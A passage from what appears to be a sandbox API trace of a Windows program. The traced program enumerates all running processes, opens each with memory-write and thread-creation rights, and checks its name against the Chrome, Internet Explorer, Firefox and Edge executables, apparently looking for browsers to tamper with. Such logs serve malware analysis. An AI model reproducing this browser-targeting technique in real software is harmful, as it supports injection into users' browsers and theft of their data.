	[0234.761] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0234.762] CloseHandle (hObject=0x4fd0) returned 1
	[0234.762] Sleep (dwMilliseconds=0x64) 
	[0234.860] GetCurrentProcessId () returned 0x110
	[0234.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0234.865] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0234.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0234.867] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0234.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7464
	[0234.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.868] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.868] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.869] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.869] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.870] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7468
	[0234.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.871] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.871] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.872] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.872] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0234.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x746c
	[0234.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.874] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0234.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.875] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.875] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0234.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.876] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.876] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7470
	[0234.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.877] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.878] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.878] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.879] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.879] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0234.880] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7474
	[0234.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.880] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0234.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.881] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.881] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0234.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.882] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0234.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7478
	[0234.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.883] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0234.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.884] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.884] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0234.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.885] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0234.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x747c
	[0234.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.886] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0234.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.887] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.887] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0234.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.887] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0234.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7480
	[0234.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.889] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.889] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.890] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.891] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.891] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7484
	[0234.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.892] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.893] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.893] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.894] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.894] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7488
	[0234.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.895] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.896] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.896] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.897] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x748c
	[0234.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.898] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.899] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.899] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.900] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7490
	[0234.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.901] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.903] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.904] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.904] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7494
	[0234.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.906] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.907] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.907] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.908] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.908] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7498
	[0234.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.909] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.910] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.910] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.911] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x749c
	[0234.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.912] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.913] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.913] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.914] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0234.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x74a0
	[0234.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.915] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0234.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.915] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.915] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0234.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.916] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x74a4
	[0234.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.917] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.917] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.918] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.918] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0234.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x74a8
	[0234.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.919] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.919] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.920] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.920] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x74ac
	[0234.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.922] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.922] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.923] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.923] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x74b0
	[0234.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.924] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.925] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.925] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.925] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.925] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x74b4
	[0234.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.926] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.927] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.927] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.927] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0234.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x74b8
	[0234.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.928] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0234.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.929] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.929] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0234.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.929] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0234.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74bc
	[0234.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.931] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.931] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.931] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.931] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.931] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0234.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x74c0
	[0234.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.932] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0234.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.933] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
